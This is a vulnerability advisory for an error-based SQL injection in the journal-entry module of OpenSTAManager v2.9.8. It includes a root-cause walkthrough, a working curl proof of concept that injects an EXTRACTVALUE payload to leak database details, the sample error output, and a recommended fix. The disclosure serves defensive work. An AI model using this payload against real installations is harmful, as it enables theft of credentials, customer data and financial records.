PT-2026-6849 · Packagist · Devcode-It/Openstamanager
Published
2026-02-06
·
Updated
2026-02-06
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
Critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.
Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameters:
id documenti (GET parameters)
Affected Endpoint: /modules/primanota/add.php
Attack Type: Error-Based SQL Injection (IN clause)Details
OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from GET parameters are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Vulnerability Chain:
- Entry Point:
/modules/primanota/add.php(Lines 63-67)
$id documenti = $id documenti ?: get('id documenti');
$id documenti = $id documenti ? explode(',', (string) $id documenti) : [];Impact: The
get() function retrieves user-controlled URL parameters, explode(',', (string) ...) splits them by comma, but NO validation ensures elements are integers.- SQL Injection Point:
/modules/primanota/add.php(Line 306)
$id anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co documenti WHERE id IN('.($id documenti ? implode(',', $id documenti) : 0).')')['idanagrafica'];Impact: Array elements from
$id documenti are directly concatenated using implode() without type validation or prepare(), enabling full SQL injection.Root Cause Analysis:
The vulnerability exists because:
get('id documenti')return user-controlled stringsexplode(',', (string) $value)splits by comma but doesn't validate typesimplode(',', $array)concatenates array elements directly into SQL- No validation ensures array elements are integers
- Attacker can inject SQL by providing:
?id documenti=1) AND EXTRACTVALUE(...) %23
Affected Code Path:
GET /modules/primanota/add.php?id documenti=MALICIOUS PAYLOAD
↓
add.php:63 - $id documenti = get('id documenti')
↓
add.php:64 - $id documenti = explode(',', (string) $id documenti) [NO TYPE VALIDATION]
↓
add.php:306 - WHERE id IN('.implode(',', $id documenti).') [INJECTION POINT]PoC
Step 1: Login
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login'
-d 'username=admin&password=admin'Step 2: Verify Vulnerability (Error-Based SQL Injection)
Test 1: Extract Database User and Version
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"Response (error message visible to attacker):
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~osm@172.18.0.3 | 8.3.0'</code>Impact
All authenticated users with access to the Prima Nota (Journal Entry) module.
Recommended Fix
Primary Fix - Type Validation:
File:
/modules/primanota/add.phpBEFORE (Vulnerable - Lines 63-67):
$id documenti = $id documenti ?: get('id documenti');
$id documenti = $id documenti ? explode(',', (string) $id documenti) : [];AFTER (Fixed):
$id documenti = $id documenti ?: get('id documenti');
$id documenti = $id documenti ? explode(',', (string) $id documenti) : [];
// Validate that all array elements are integers
$id documenti = array map('intval', $id documenti);
$id documenti = array filter($id documenti, fn($id) => $id > 0); // Remove zero/negative IDsCredits
Discovered by Łukasz Rybak
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Devcode-It/Openstamanager